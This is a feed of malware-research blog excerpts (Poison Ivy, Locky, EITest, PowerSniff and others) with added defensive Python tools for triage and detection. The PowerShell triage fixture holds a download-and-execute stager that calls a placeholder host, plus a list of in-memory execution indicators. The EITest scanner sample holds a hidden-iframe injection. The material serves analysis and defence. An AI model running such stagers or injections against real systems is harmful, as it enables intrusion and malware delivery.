New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists

Malware writers have always sought to develop feature-rich, easy-to-use tools that are also somewhat hard to detect by both host- and network-based detection systems. For many years, one of the go-to malware families for both less-skilled and advanced actors has been the Poison Ivy (aka PIVY) RAT. Poison Ivy has a convenient graphical user interface (GUI) for managing compromised hosts and provides easy access to a rich suite of post-compromise tools. It is no surprise that it is now being used against pro-democracy organizations and supporters in Hong Kong, who have long been a target of advanced attack campaigns.

Despite its simplicity and prevalence, detection rates for both AV and IDS systems have always been surprisingly low for Poison Ivy. Possibly for these reasons, since the mid-2000s threat actors have frequently used Poison Ivy to establish beachheads within target organizations, although this occurs much less often today than in years past. Since the last public release, version 2.3.2 in 2008, new variants of the tool have been relatively rare, especially versions that modify the core communication protocol.

Unit 42 observed a new version of Poison Ivy that uses the popular search-order hijacking (a/k/a “DLL sideloading”) technique frequently seen in malware such as PlugX. The Poison Ivy builder can output either a PE file or shellcode; in this case the backdoor was built as shellcode and then obfuscated to help evade detection. While analyzing the sample, we also observed a modified network communication protocol, which is discussed in this post. Continue reading "New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists"
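Search-order hijacking works because Windows looks in the application's own directory before the system directory, so a DLL dropped next to a legitimate executable is what actually gets loaded. The following checker is an added example written for this page, not code from Unit 42 or from the Poison Ivy analysis: it flags DLLs in an application directory that share a name with a system DLL, skipping the KnownDLLs set (which the loader maps from the KnownDLLs section regardless of the search path). The KnownDLLs subset and the file lists are assumptions constructed for the example.

```python
import os
from typing import Iterable, List

# Assumed partial subset of KnownDLLs. The authoritative list is the
# KnownDLLs registry key on the host being checked; entries here are exempt
# from search-order hijacking because the loader never searches for them.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll",
              "gdi32.dll", "advapi32.dll", "ole32.dll", "shell32.dll"}


def find_shadowed_dlls(app_dir_files: Iterable[str],
                       system_dlls: Iterable[str],
                       known_dlls: Iterable[str] = KNOWN_DLLS) -> List[str]:
    """Return DLL names in an application directory that shadow a system DLL.

    A same-named DLL beside a legitimate (often signed) executable wins the
    search order and is loaded instead of the genuine library, unless the
    name is a KnownDLL.
    """
    system = {n.lower() for n in system_dlls if n.lower().endswith(".dll")}
    known = {n.lower() for n in known_dlls}
    return sorted(n for n in app_dir_files
                  if n.lower().endswith(".dll")
                  and n.lower() in system
                  and n.lower() not in known)


def scan_app_directory(app_dir: str,
                       system_dir: str = r"C:\Windows\System32") -> List[str]:
    """Filesystem wrapper for a live Windows host or a mounted disk image."""
    return find_shadowed_dlls(os.listdir(app_dir), os.listdir(system_dir))


if __name__ == "__main__":
    # Constructed listings standing in for a real application directory.
    app_files = ["viewer.exe", "msi.dll", "kernel32.dll", "readme.txt"]
    sys_files = ["MSI.DLL", "kernel32.dll", "user32.dll"]
    print(find_shadowed_dlls(app_files, sys_files))
```

The check is a heuristic: a sideloaded DLL only needs to match a name the host executable imports, which may be a vendor DLL rather than a System32 one, so pair it with a look at the executable's import table and at whether the DLL is signed by the same publisher.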

Python-Based PWOBot Targets European Organizations

We have discovered a malware family named ‘PWOBot’ that is unusual in that it is written entirely in Python and compiled with PyInstaller into a Microsoft Windows executable. The malware has been observed affecting a number of Europe-based organizations, particularly in Poland, and is delivered via a popular Polish file-sharing web service.

The malware itself provides a wealth of functionality, including the ability to download and execute files, execute Python code, log keystrokes, spawn an HTTP server, and mine digital currency using the victim’s CPUs and GPUs.

There are at least 12 variants of PWOBot, and the malware has been observed in attacks dating back to late 2013. More recent attacks affecting organizations were observed from mid to late 2015. Continue reading "Python-Based PWOBot Targets European Organizations"
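A PyInstaller-built executable is easy to recognize during triage because the bootloader appends a fixed cookie, beginning with the magic bytes `MEI\014\013\012\013\016`, that locates the embedded archive. The parser below is an added example for this page, not code from the PWOBot analysis; it assumes the 88-byte cookie layout used by PyInstaller 2.1-era releases (magic, package length, TOC offset, TOC length, Python version encoded as major*10+minor, library name) and builds a constructed stand-in binary, not a real sample, to run against.

```python
import struct
from typing import Dict, Optional

# Cookie magic the PyInstaller bootloader writes at the end of its output:
# 'MEI\014\013\012\013\016' in octal escapes.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Assumed cookie layout (PyInstaller 2.1-era, big-endian, 88 bytes):
# magic, package length, TOC offset, TOC length, python version, python lib.
COOKIE_FMT = "!8siiii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)


def parse_pyinstaller_cookie(data: bytes) -> Optional[Dict[str, object]]:
    """Return the decoded cookie if `data` looks like a PyInstaller-built binary."""
    pos = data.rfind(PYINSTALLER_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    _, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FMT, data[pos:pos + COOKIE_SIZE])
    if pkg_len <= 0 or toc_off < 0 or toc_len <= 0:
        return None  # magic found in unrelated data, not a sane cookie
    return {
        "cookie_offset": pos,
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        # Assumes the major*10+minor encoding of PyInstaller 2.x/3.x.
        "python_version": f"{pyvers // 10}.{pyvers % 10}",
        "python_lib": pylib.rstrip(b"\x00").decode("ascii", errors="replace"),
    }


def build_sample_binary() -> bytes:
    """Constructed stand-in for PyInstaller output: a fake PE prefix, filler in
    place of the bootloader and archive, then a cookie. Not real malware."""
    body = b"MZ" + b"\x00" * 200 + b"PYZ-00.pyz" + b"\x00" * 100
    cookie = struct.pack(COOKIE_FMT, PYINSTALLER_MAGIC, len(body), 200, 64, 27,
                         b"python27.dll")
    return body + cookie


if __name__ == "__main__":
    print(parse_pyinstaller_cookie(build_sample_binary()))
```

Once the cookie is located, the TOC offset and length point at the entries (compiled scripts, PYZ archive, bundled DLLs) that a decompiler such as uncompyle6 can then be pointed at; the Python version field tells you which bytecode to expect.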

Click-Fraud Ramdo Malware Family Continues to Plague Users


Ramdo is a family of malware that performs fraudulent website ‘clicks.’ Ramdo malware activity first surfaced in late 2013 and has since continued to infect machines worldwide, primarily through the use of exploit kits. In this blog post, we’ll take a deep dive into the technical aspects of the Ramdo malware itself, providing insight into how the malware functions, as well as techniques on how analysts can reverse-engineer this particular threat.

This research is a joint effort from Unit 42 and Dell Secureworks Counter Threat Unit. For more information about the Ramdo threat, please also refer to the published blog post from Dell Secureworks CTU.

For the remainder of this blog post, we will be dealing with the following sample, which first surfaced on January 22, 2016. Continue reading "Click-Fraud Ramdo Malware Family Continues to Plague Users"

Ransomware: Locky, TeslaCrypt, Other Malware Families Use New Tool To Evade Detection

Today we identified a new tool actively being used by the Locky ransomware family to evade detection and potentially infect endpoints. Unit 42 identified slight changes in Locky detonations through the AutoFocus threat intelligence service, correlating global data to discover a new tool being used to pack multiple ransomware families. Adversaries are constantly seeking new techniques to bypass security controls, and based on data from AutoFocus, this represents a widespread update to their tradecraft.

In our analysis, multiple malware samples stood out because they appeared to obfuscate their API calls, resolving system functions from a dictionary of embedded terms to hide their true capabilities from commonly used static analysis tools. Continue reading "Ransomware: Locky, TeslaCrypt, Other Malware Families Use New Tool To Evade Detection"
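Resolving imports at runtime from embedded values rather than a normal import table is a standard way to keep function names out of a static analyst's view. The block below is an added example for this page and does not reproduce the scheme of the packer discussed above, which the excerpt does not describe; it uses the common 32-bit rotate-right-by-13 (ROR13) hash as a stand-in, shows the malware-side lookup (walk the export names until one hashes to the embedded value) and the analyst-side reverse (precompute a hash table from a dumped export list). The export list is a constructed sample, not a real DLL dump.

```python
from typing import Dict, Iterable, List, Optional


def ror13_hash(name: str) -> int:
    """32-bit ROR13 string hash, common in shellcode and packers. Used here
    as an illustrative scheme, not the one used by the tool discussed above."""
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + byte) & 0xFFFFFFFF
    return h


def resolve_by_hash(target: int, exports: Iterable[str]) -> Optional[str]:
    """Malware-side view: walk a module's export names and return the one
    whose hash matches the embedded value (the binary never stores the name)."""
    for name in exports:
        if ror13_hash(name) == target:
            return name
    return None


def build_hash_table(exports: Iterable[str]) -> Dict[int, str]:
    """Analyst-side view: precompute hash -> name from a dumped export list so
    embedded constants found in a sample can be labelled in bulk."""
    table: Dict[int, str] = {}
    for name in exports:
        h = ror13_hash(name)
        if h in table and table[h] != name:
            raise ValueError(f"hash collision: {table[h]} / {name}")
        table[h] = name
    return table


def resolve_hashes(hashes: Iterable[int], table: Dict[int, str]) -> List[Optional[str]]:
    """Map each embedded constant to an export name, or None if unknown."""
    return [table.get(h) for h in hashes]


# Constructed export list standing in for what you would dump from the real
# kernel32/ws2_32 export tables (for example with pefile).
SAMPLE_EXPORTS = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc",
                  "VirtualProtect", "CreateThread", "WriteProcessMemory",
                  "WSAStartup", "connect"]


if __name__ == "__main__":
    embedded = [ror13_hash("VirtualAlloc"), ror13_hash("CreateThread")]
    print(resolve_hashes(embedded, build_hash_table(SAMPLE_EXPORTS)))
```

In practice you recover the hashing routine from the unpacking stub first, then regenerate the table from the exports of every DLL the sample loads; a mismatch on every constant usually means the routine also mixes in the module name or a per-sample seed.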

Don’t Be an April Fool: Inside a Common Phone Scam

One of our team members on Unit 42 recently received a phone call from a scammer, and since today is April Fools' Day we decided to write about how we played along with the scammer to learn about his operation.

Unit 42 analyst Robert received a phone call from a Tech Support scammer who told him his system was compromised and had been seen performing illegal activities. The scam relied solely on social engineering, a technique for manipulating a victim into doing something or giving up information; in this case the aim was to get Robert to pay the scammer for unneeded system protection services. Social engineering is used in the majority of cybercrime and espionage attacks, although in this scam it was conducted over the phone rather than via e-mail or social networking.

This blog, in Robert's voice, recounts the story of this unsolicited call and provides a glimpse into this scam operation. We intend this story to be light reading for security professionals, but hope that it provides awareness for less technical folks into the social engineering techniques used in these types of scams. Continue reading "Don’t Be an April Fool: Inside a Common Phone Scam"

How the EITest Campaign's Path to Angler EK Evolved Over Time

In October 2014, Malwarebytes identified a campaign based on thousands of compromised websites that kicked off an infection chain to Angler exploit kit (EK). It was named "EITest" campaign, because "EITest" was a variable consistently found in injected scripts across all of the compromised websites. Malwarebytes noted some changes in this campaign in 2015 and 2016.

Like others in the cybersecurity threat research community, we have been tracking the EITest campaign. This blog post focuses on network traffic and how indicators have changed over time. Continue reading "How the EITest Campaign's Path to Angler EK Evolved Over Time"

ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe


Unit 42 is currently researching an attack campaign that targets government and military personnel of India. This attack appears to overlap with the Operation Transparent Tribe and Operation C-Major campaigns that targeted Indian embassies in Saudi Arabia and Kazakhstan, as well as the Indian military.

We are tracking the group of actors involved in this campaign as ‘ProjectM.’ During our research, we found a link between the infrastructure used by ProjectM and an individual from Pakistan. We cannot definitively confirm that this individual is involved with this attack campaign, but the evidence discussed in this blog post suggests that it is highly likely that this individual has some involvement with the threat group.

This blog post highlights the trail of evidence individuals leave on the Internet when they are not careful about disguising their identity. All of the information collected about this actor is public and accessible through open source research. Continue reading "ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe"

Palo Alto Networks Researchers Discover Critical IE Vulnerabilities

Palo Alto Networks researchers Tongbo Luo and Hui Gao were credited with discovering new critical Microsoft vulnerabilities affecting Internet Explorer (IE) versions 7, 8, 9, 10 and 11 on affected Windows clients. These vulnerabilities are documented in Microsoft Security Bulletins MS15-106 and MS15-112. Continue reading "Palo Alto Networks Researchers Discover Critical IE Vulnerabilities"

Evolution of SamSa Malware Suggests New Ransomware Tactics In Play

Ransomware is often in the headlines as new families are discovered on an almost weekly basis. Historically, these families have shared one similarity – they have all been deployed by attackers casting a wide net and largely being victim-agnostic. In most cases, the adversaries have used phishing emails and exploit kits in a ‘spray and pray’ style tactic.

However, in recent months, a new trend seems to be emerging: targeted attacks where ransomware is deployed by threat actors after successfully gaining unauthorized access to an organization’s network. One malware family seen in such attacks is known as ‘SamSa’, ‘Samas’, ‘samsam’, or most recently, ‘MOKOPONI’. Reports on this malware family have previously been published by both Intel Security and Microsoft.

Palo Alto Networks has collected over 20 samples of this particular malware family, and we have identified over $70,000 USD in Bitcoin payments to the attacker (Cisco Talos yesterday reported this figure to be closer to $115,000 USD). This blog details the evolution of this malware family, which was first witnessed in December 2015, as well as provides various indicators of compromise (IOCs) that can be used by the security community. Continue reading "Evolution of SamSa Malware Suggests New Ransomware Tactics In Play"

Campaign Evolution: Darkleech to Pseudo-Darkleech and Beyond

In 2015, Sucuri published two blog posts, one in March describing a pseudo-Darkleech campaign targeting WordPress sites, and another about its evolution the following December. Sites compromised by this campaign redirected unsuspecting users to an exploit kit (EK). The Sucuri posts describe patterns in the injected script related to this campaign. Since December 2015, patterns associated with pseudo-Darkleech have continued to evolve. Our blog post today will examine these changes.

However, before we look at the recent developments, we should understand how EKs fit into the overall picture and review the history of Darkleech.
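Both the EITest entry above and this pseudo-Darkleech entry concern script injected into compromised sites to start a redirect chain toward an EK, with the injection identified by patterns in the script itself (for EITest, a variable literally named EITest). The scanner below is an added example written for this page, not code from Unit 42, Malwarebytes or Sucuri: it pulls inline script blocks out of fetched HTML, flags those containing a configurable indicator identifier, and extracts any URL literals they carry as the next hop to pivot on. The sample page is constructed; its only resemblance to the real campaigns is the variable name, and the domain is a reserved `.invalid` placeholder.

```python
import re
from typing import Dict, Iterable, List

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.IGNORECASE)


def find_injected_scripts(html: str,
                          indicators: Iterable[str] = ("EITest",)) -> List[Dict[str, object]]:
    """Return inline <script> blocks that mention any indicator identifier,
    with the URL literals they carry (the next hop in the redirect chain)."""
    findings: List[Dict[str, object]] = []
    for match in SCRIPT_RE.finditer(html):
        body = match.group(1)
        hits = [ind for ind in indicators
                if re.search(r"\b" + re.escape(ind) + r"\b", body)]
        if hits:
            findings.append({
                "offset": match.start(),
                "indicators": hits,
                "urls": URL_RE.findall(body),
                "snippet": " ".join(body.split())[:100],
            })
    return findings


# Constructed page with one benign inline script and one injected block.
SAMPLE_HTML = """<html><body>
<script src="/static/app.js"></script>
<script>var analyticsId = "UA-0000";</script>
<p>Hello</p>
<script>var EITest = "x"; var f = document.createElement("iframe");
f.src = "http://example.invalid/path/index.php"; f.style.display = "none";
document.body.appendChild(f);</script>
</body></html>"""


if __name__ == "__main__":
    for finding in find_injected_scripts(SAMPLE_HTML):
        print(finding["offset"], finding["indicators"], finding["urls"])
```

Run it over a crawl of the site's HTML rather than a single page: injections of this kind are usually applied server-side to every response, so one hit typically means the whole site is compromised, and the extracted URLs are what you feed into passive DNS and traffic searches to map the gate domains as they rotate.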

Continue reading "Campaign Evolution: Darkleech to Pseudo-Darkleech and Beyond"

Locky Ransomware Installed Through Nuclear EK

In February 2016, Unit 42 published detailed analysis of Locky ransomware. We certainly weren’t the only ones who saw this malware, and many others have also reported on it. Since that time, Locky has been frequently noted in various campaigns using malicious spam (malspam) to spread this relatively new strain of ransomware.

When we initially reported on Locky, attackers were distributing the malware using Microsoft Office documents with malicious macros to download and execute the ransomware. Attackers quickly added another tactic, sending e-mails with zip attachments containing malicious JavaScript files to accomplish the same goal. However, exploit kits (EKs) have also been used to infect users with Locky during casual web browsing. This activity suggests that there are effectively two paths to Locky: one through malspam and another through EK traffic.
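The malspam path described above hinges on attachments: macro-enabled Office documents, or zip archives carrying a JavaScript downloader. The triage helper below is an added example for this page, not code from the Locky analysis; it opens a zip attachment in memory, flags members by script/executable extension, macro-enabled document type and double extensions, and tolerates non-zip input. The extension lists and the sample archive are constructed for the example.

```python
import io
import zipfile
from typing import Dict, List

# Extensions that execute when double-clicked on a default Windows install
# (assumed list; extend to match your mail gateway's policy).
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1",
               ".cmd", ".bat", ".exe", ".scr", ".pif", ".com", ".jar"}
MACRO_EXTS = {".docm", ".dotm", ".xlsm", ".xltm", ".pptm"}
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".txt", ".jpg"}


def classify_member(name: str) -> List[str]:
    """Reasons a single archive member looks like a malspam payload."""
    low = name.lower().rsplit("/", 1)[-1]
    parts = low.split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    reasons: List[str] = []
    if ext in SCRIPT_EXTS:
        reasons.append("script-or-executable")
    if ext in MACRO_EXTS:
        reasons.append("macro-enabled-document")
    if len(parts) > 2 and ("." + parts[-2]) in DECOY_EXTS:
        reasons.append("double-extension")  # e.g. scan.pdf.exe
    return reasons


def triage_zip_attachment(blob: bytes) -> Dict[str, object]:
    """Inspect a zip attachment without extracting it to disk."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return {"is_zip": False, "members": 0, "flagged": []}
    flagged: List[Dict[str, object]] = []
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_member(info.filename)
            if reasons:
                flagged.append({"name": info.filename,
                                "size": info.file_size,
                                "reasons": reasons})
        return {"is_zip": True, "members": len(zf.namelist()), "flagged": flagged}


def build_sample_attachment() -> bytes:
    """Constructed attachment: a placeholder .js beside a benign text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice_0412.js", "// constructed placeholder, not a real downloader\n")
        zf.writestr("notes.txt", "benign text\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_zip_attachment(build_sample_attachment()))
```

Blocking on these reasons at the gateway catches the common Locky lures; keep the member sizes, since a tiny .js in an "invoice" zip is the downloader rather than the payload and is the artifact worth detonating.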

Continue reading "Locky Ransomware Installed Through Nuclear EK"

AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device

We’ve discovered a new family of iOS malware, which we’ve named “AceDeceiver”, that successfully infected non-jailbroken devices.

What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel attack vector.

AceDeceiver is the first iOS malware we’ve seen that abuses certain design flaws in Apple’s DRM protection mechanism -- namely FairPlay -- to install malicious apps on iOS devices regardless of whether they are jailbroken. This technique is called “FairPlay Man-In-The-Middle (MITM)” and has been used since 2013 to spread pirated iOS apps, but this is the first time we’ve seen it used to spread malware. (The FairPlay MITM attack technique was also presented at the USENIX Security Symposium in 2014; however, attacks using this technique are still occurring successfully.)

Continue reading "AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device"

Digital Quartermaster Scenario Demonstrated in Attacks Against the Mongolian Government

Unit 42 has collected multiple spear phishing emails, weaponized document files, and payloads that targeted various offices of the Mongolian government between August 2015 and February 2016. The phishing emails and document files used a variety of geopolitically sensitive subjects as lures, such as events in Beijing, the Dalai Lama, North Korea relations, the Zika virus, and various legitimate-appearing announcements. As we analyzed the samples we collected, we found significant overlaps with previously reported and documented adversary groups, attack campaigns, and their toolsets, exemplifying the concept of the Digital Quartermaster.

Continue reading "Digital Quartermaster Scenario Demonstrated in Attacks Against the Mongolian Government"

PowerSniff Malware Used in Macro-based Attacks

Introduction

The concept of file-less malware is not a new one. Families like Poweliks, which abuse Microsoft’s PowerShell, have emerged in recent years and have garnered extensive attention because they can compromise a system while leaving little or no trace of their presence for traditional forensic techniques to find.

System administrators have lauded the power and versatility of PowerShell since version 2.0 was integrated into Windows 7. Unfortunately, with such versatility comes the opportunity for abuse, specifically the ability to write directly into process memory on the host.

Typically, file-less malware has been observed in the context of exploit kits such as Angler. Palo Alto Networks has observed a recent high-threat spam campaign that serves malicious macro documents used to execute PowerShell scripts that inject malware similar to the Ursnif family directly into memory. We call the malware PowerSniff. Continue reading "PowerSniff Malware Used in Macro-based Attacks"
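Because the chain described above (Office macro launches PowerShell, PowerShell injects directly into memory) leaves little on disk, the place to catch it is process-creation telemetry: an Office parent spawning powershell.exe with a hidden window and an encoded command. The triage script below is an added example for this page, not code from the PowerSniff analysis; it decodes `-EncodedCommand` (base64 of the UTF-16LE script), scores the usual flags, and looks in the decoded script for staging and in-memory execution calls. The tab-separated log format, the indicator strings and the sample events are constructed for the example; the stager string is a placeholder pointing at a reserved `.invalid` host, not a real PowerSniff payload.

```python
import base64
import binascii
import re
from typing import Dict, Iterable, List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script fragments that suggest staging or in-memory execution (assumed list).
MEMORY_INDICATORS = ("VirtualAlloc", "WriteProcessMemory", "CreateThread",
                     "CreateRemoteThread", "Invoke-Expression", "IEX",
                     "DownloadString", "FromBase64String",
                     "[Reflection.Assembly]::Load")
# -EncodedCommand and the abbreviations PowerShell accepts for it (approximation).
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """What PowerShell expects after -EncodedCommand: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def triage_process_event(parent_image: str, image: str, cmdline: str) -> Dict[str, object]:
    """Score one process-creation event; two or more flags is worth a look."""
    flags: List[str] = []
    decoded: Optional[str] = None
    if image.lower().rsplit("\\", 1)[-1] == "powershell.exe":
        if parent_image.lower().rsplit("\\", 1)[-1] in OFFICE_PARENTS:
            flags.append("office-parent")
        low = cmdline.lower()
        if re.search(r"-w(?:indowstyle)?\s+hidden", low):
            flags.append("hidden-window")
        if re.search(r"(?:^|\s)-nop\b|-noprofile", low):
            flags.append("no-profile")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            flags.append("encoded-command")
        script = decoded if decoded is not None else cmdline
        hits = [ind for ind in MEMORY_INDICATORS if ind.lower() in script.lower()]
        if hits:
            flags.append("memory-execution:" + ",".join(hits))
    return {"suspicious": len(flags) >= 2, "flags": flags, "decoded": decoded}


def triage_log(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Constructed log format: parent image, image, command line, tab-separated."""
    results: List[Dict[str, object]] = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 3:
            continue
        r = triage_process_event(*parts)
        if r["suspicious"]:
            results.append({"cmdline": parts[2], **r})
    return results


def sample_log() -> List[str]:
    """Two constructed events: a benign admin script and a macro-launched stager."""
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    stager = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
    return [
        "C:\\Windows\\explorer.exe\t" + ps + "\tpowershell.exe -File C:\\scripts\\backup.ps1",
        "C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\t" + ps
        + "\tpowershell.exe -nop -w hidden -enc " + encode_powershell(stager),
    ]


if __name__ == "__main__":
    for hit in triage_log(sample_log()):
        print(hit["flags"], hit["decoded"])
```

The decoded script is the artifact to keep: with no dropped file, it and the memory of the target process are often the only copies of the payload, so hand the decoded text to whoever is dumping the injected process.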

Palo Alto Networks Researcher Discovers Critical IE Vulnerability

Palo Alto Networks researcher Hui Gao was credited with the discovery of a new critical Microsoft vulnerability affecting Internet Explorer (IE) versions 9, 10 and 11. This vulnerability is covered in Microsoft’s March 2016 Security Bulletin and documented in Microsoft Security Bulletin MS16-023. Continue reading "Palo Alto Networks Researcher Discovers Critical IE Vulnerability"